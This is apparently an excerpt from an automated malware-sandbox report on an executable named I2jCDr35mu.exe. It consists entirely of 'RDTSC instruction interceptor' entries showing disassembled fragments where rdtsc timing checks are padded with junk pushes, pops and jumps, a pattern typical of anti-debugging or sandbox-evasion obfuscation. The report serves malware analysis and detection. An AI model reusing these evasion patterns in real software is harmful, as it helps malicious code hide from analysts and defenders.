                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E457 second address: 000000000033E45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000033E45D second address: 000000000033E461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000346187 second address: 000000000034618D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345878 second address: 000000000034587E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003459EF second address: 00000000003459FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F7E95375CFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345BCA second address: 0000000000345BD4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E954D64A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345BD4 second address: 0000000000345BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345BDA second address: 0000000000345C12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jc 00007F7E954D64A6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnp 00007F7E954D64AEh 0x00000015 jmp 00007F7E954D64B8h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000345C12 second address: 0000000000345C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034BFF8 second address: 000000000034C009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64ACh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C009 second address: 000000000034C03B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7E95375CF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7E95375D00h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jl 00007F7E95375CFCh 0x0000001b jnp 00007F7E95375CF6h 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C03B second address: 000000000034C04C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C04C second address: 000000000034C063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C063 second address: 000000000034C067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C127 second address: 000000000034C18E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E95375D04h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jnl 00007F7E95375D00h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jmp 00007F7E95375D04h 0x00000025 jnp 00007F7E95375CFCh 0x0000002b jnp 00007F7E95375CF6h 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 je 00007F7E95375D04h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000034C248 second address: 000000000034C24D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D9799 second address: 00000000002D97AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E95375CFBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D97AF second address: 00000000002D97B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035037C second address: 0000000000350395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350911 second address: 0000000000350926 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jng 00007F7E954D64A6h 0x00000014 pop eax 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350BCA second address: 0000000000350BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7E95375CF6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350BD4 second address: 0000000000350C18 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7E954D64A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F7E954D64A6h 0x00000013 pushad 0x00000014 popad 0x00000015 jg 00007F7E954D64A6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 jmp 00007F7E954D64B9h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a jl 00007F7E954D64A6h 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350C18 second address: 0000000000350C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350C1C second address: 0000000000350C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350D9B second address: 0000000000350D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000350EED second address: 0000000000350EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000351039 second address: 000000000035103F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000035103F second address: 0000000000351049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000351049 second address: 0000000000351077 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007F7E95375CFFh 0x0000000e jmp 00007F7E95375D02h 0x00000013 pop ebx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000351326 second address: 000000000035134B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64B2h 0x00000009 popad 0x0000000a jnp 00007F7E954D64B2h 0x00000010 jng 00007F7E954D64A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002D7D7D second address: 00000000002D7D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a jnp 00007F7E95375CF6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FD7 second address: 0000000000329FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FDB second address: 0000000000329FE5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E95375CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FE5 second address: 0000000000329FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E954D64AEh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FF7 second address: 0000000000329FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 0000000000329FFB second address: 00000000003078E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dx, 1E00h 0x0000000f call dword ptr [ebp+122D1822h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7E954D64B7h 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f ja 00007F7E954D64A6h 0x00000025 pop ecx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A19D second address: 000000000032A1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000032A4D6 second address: 000000000016F99D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E954D64A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edx, 7237456Ah 0x00000013 push dword ptr [ebp+122D0FD1h] 0x00000019 clc 0x0000001a mov edi, dword ptr [ebp+122D381Dh] 0x00000020 call dword ptr [ebp+122D2E8Ah] 0x00000026 pushad 0x00000027 pushad 0x00000028 or edx, 3C219123h 0x0000002e and eax, dword ptr [ebp+122D3885h] 0x00000034 popad 0x00000035 mov dword ptr [ebp+122D2E6Ah], ebx 0x0000003b xor eax, eax 0x0000003d jmp 00007F7E954D64B3h 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 mov dword ptr [ebp+122D2D51h], ecx 0x0000004c mov dword ptr [ebp+122D38B1h], eax 0x00000052 cld 0x00000053 mov esi, 0000003Ch 0x00000058 cmc 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d jmp 00007F7E954D64B8h 0x00000062 lodsw 0x00000064 jmp 00007F7E954D64B5h 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F7E954D64B4h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 cld 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B722A second address: 00000000003B7230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B7230 second address: 00000000003B7249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E954D64AEh 0x00000008 jbe 00007F7E954D64A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B7249 second address: 00000000003B7266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375D04h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003B7266 second address: 00000000003B726A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA564 second address: 00000000003BA576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA576 second address: 00000000003BA57C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA57C second address: 00000000003BA580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA393 second address: 00000000003BA3B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F7E954D64A6h 0x00000013 jo 00007F7E954D64A6h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA3B4 second address: 00000000003BA3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFCh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F7E95375D04h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003BA3DF second address: 00000000003BA3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64ACh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C24CD second address: 00000000003C24D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C6EF2 second address: 00000000003C6EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C6EF6 second address: 00000000003C6EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C6EFA second address: 00000000003C6F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7E954D64ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003C6F17 second address: 00000000003C6F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7E95375CFFh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E95375D01h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CC884 second address: 00000000003CC894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7E954D64A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CC894 second address: 00000000003CC8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95375D01h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CB387 second address: 00000000003CB38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CB38B second address: 00000000003CB3A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95375CFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7E95375CFEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003D0329 second address: 00000000003D032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CFF2A second address: 00000000003CFF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CFF2E second address: 00000000003CFF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CFF32 second address: 00000000003CFF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7E95375CF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003CFF49 second address: 00000000003CFF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003DE810 second address: 00000000003DE818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003DE818 second address: 00000000003DE81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003DE81D second address: 00000000003DE824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003F1721 second address: 00000000003F1725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003F1725 second address: 00000000003F1735 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E95375CF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000003F1735 second address: 00000000003F1751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64B7h 0x00000009 pop ebx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041AF05 second address: 000000000041AF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041AF0A second address: 000000000041AF32 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7E954D64AEh 0x00000008 jg 00007F7E954D64A6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F7E954D64B2h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041AF32 second address: 000000000041AF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A0E3 second address: 000000000041A0ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7E954D64A6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A0ED second address: 000000000041A11D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7E95375D01h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E95375D04h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A11D second address: 000000000041A121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A625 second address: 000000000041A63E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E95375D02h 0x00000008 jnc 00007F7E95375CF6h 0x0000000e jnl 00007F7E95375CF6h 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A63E second address: 000000000041A671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F7E954D64B5h 0x0000000f jmp 00007F7E954D64B0h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A7BC second address: 000000000041A7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F7E95375D07h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A7DE second address: 000000000041A7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E954D64ADh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A7F6 second address: 000000000041A826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7E95375D05h 0x0000000b popad 0x0000000c js 00007F7E95375CFCh 0x00000012 jnp 00007F7E95375CF6h 0x00000018 jnp 00007F7E95375D15h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A826 second address: 000000000041A85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E954D64B9h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E954D64B5h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000041A99F second address: 000000000041A9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7E95375CF6h 0x0000000a rdtsc
